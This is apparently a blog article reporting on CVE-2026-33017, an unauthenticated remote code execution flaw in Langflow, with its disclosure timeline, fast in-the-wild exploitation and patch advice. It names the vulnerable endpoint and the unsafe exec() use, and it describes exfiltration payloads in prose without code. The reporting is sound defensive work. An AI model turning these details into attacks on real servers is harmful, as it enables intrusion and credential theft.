Hackers Exploited a Critical Langflow Bug Within 20 Hours of Disclosure (CVE-2026-33017)

Hackers Exploited a Critical Langflow Bug Within 20 Hours of Disclosure (CVE-2026-33017) A critical vulnerability in Langflow—an open-source visual framework for building AI agents and retrieval-augmented generation (RAG) pipelines—was weaponized extremely quickly.

Korede Akinsanya

3/26/20263 min read

What is Langflow?

Langflow is a popular open-source visual framework (with over 145,000 GitHub stars) for building AI agents, workflows, and Retrieval-Augmented Generation (RAG) pipelines. It provides a drag-and-drop interface where users define "flows" — essentially graphs of components (nodes) that can include custom Python code for AI tasks like LLM integrations, data processing, or agent behaviors.Many organizations and individuals self-host Langflow instances, often exposing them publicly for demos, shared chatbots, or collaborative workflows. This widespread exposure made it an attractive target.

The Vulnerability: CVE-2026-33017 (Critical, CVSS 9.3)

  • Affected Versions: Langflow versions prior to 1.9.0 (primarily up to 1.8.1).

  • Type: Unauthenticated Remote Code Execution (RCE).

  • Root Cause: The endpoint POST /api/v1/build_public_tmp/{flow_id}/flow was designed to allow unauthenticated building of "public flows" (for sharing without login). When an optional data parameter was supplied in the request, the server used the attacker-controlled flow data (instead of trusted data from the database). This data could include arbitrary Python code in node definitions. The code was then passed directly to Python's exec() function with zero sandboxing or restrictions.

  • Impact: A single HTTP POST request from an unauthenticated attacker could execute arbitrary Python code on the server with the full privileges of the Langflow process. This allowed:

    • Reading environment variables (often containing API keys for OpenAI, Anthropic, databases, etc.).

    • Accessing/modifying files.

    • Installing malware or backdoors.

    • Deploying reverse shells.

    • Full server compromise.

This bug was similar to a previous critical flaw (CVE-2025-3248) in the /api/v1/validate/code endpoint, but the fix for that one didn't cover the public flow build endpoint properly.

Discovery and Disclosure Timeline

  • February 25, 2026: Security researcher Aviral Srivastava reported the issue via GitHub Security Advisory.

  • March 10, 2026: Langflow team acknowledged the report and merged a fix in PR #12160.

  • March 16–17, 2026: Official advisory (GHSA-vwmf-pq79-vjvx) published; CVE-2026-33017 assigned with CVSS 9.3.

  • The advisory clearly described the vulnerable endpoint and the unsafe use of attacker-supplied data with exec().

No public Proof-of-Concept (PoC) exploit was available on GitHub or elsewhere at the time of the first attacks.

Exploitation: Attacks Started Within ~20 Hours

On March 17, 2026 (around 20:05 UTC), the advisory went public.

  • Within ~20 hours (by March 18), Sysdig's Threat Research Team observed the first exploitation attempts in their honeypots.

  • Attackers built working exploits directly from the advisory text — no public PoC needed.

  • Exploitation was extremely simple: A single crafted HTTP POST request with malicious flow data containing Python payloads.

  • Example payload style observed (simplified):

    • Code that runs commands like id, base64-encodes the output, and exfiltrates it to an attacker-controlled server (e.g., via interactsh or custom domains).

    • Later payloads stole credentials, accessed files, and delivered staged malware.

  • ~25-hour mark: First successful data exfiltration observed.

  • Attacks involved mass scanning for exposed Langflow instances (common on the internet, especially those with public flows enabled for demos).

This speed highlights how quickly threat actors (including opportunistic scanners and more sophisticated groups) can operationalize clear vulnerability descriptions in popular open-source tools.

Observed attacker behavior included:

  • Credential harvesting (API keys, secrets).

  • File system access.

  • Payload staging for persistence.

CISA later added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog due to active in-the-wild exploitation.

Why So Fast?

  • No authentication required — just one request.

  • Trivial to exploit once the endpoint and exec() behavior were understood.

  • High number of exposed instances (self-hosted Langflow is popular for AI experimentation).

  • Modern attackers monitor GitHub advisories and security disclosures in real time.

  • The description in the advisory was detailed enough for skilled actors to recreate the exploit quickly.

Response and Fix

  • Fixed in Langflow 1.9.0 (and some interim releases like 1.8.2 in certain branches).

  • The patch added proper authentication checks to the public flow endpoint and prevented attacker-supplied data from being executed unchecked.

  • Langflow team responded relatively quickly (acknowledgment within ~2 weeks of report).

Recommendations from researchers and vendors:

  • Update immediately to version 1.9.0 or newer.

  • If self-hosting: Check for exposed instances, restrict public flows, or place behind authentication/reverse proxies.

  • Scan for vulnerable deployments using tools like runZero or custom Shodan queries.

  • Monitor for signs of compromise (unusual outbound connections, new files, stolen env vars).

This incident serves as a stark reminder of the risks of self-hosting AI tools with code execution features, the dangers of unsafe exec() usage, and how fast the threat landscape moves in 2026 — even without a public PoC, exploitation can begin in under a day.

Key Sources for Further Reading

  • Sysdig Technical Analysis: Detailed timeline and observed payloads.

  • Langflow GitHub Advisory (GHSA-vwmf-pq79-vjvx).

  • NVD Entry for CVE-2026-33017.

  • Researcher write-up by Aviral Srivastava on Medium.

If you're running Langflow (or Kali has tools related to testing such environments), update right away and consider auditing any public AI workflow instances.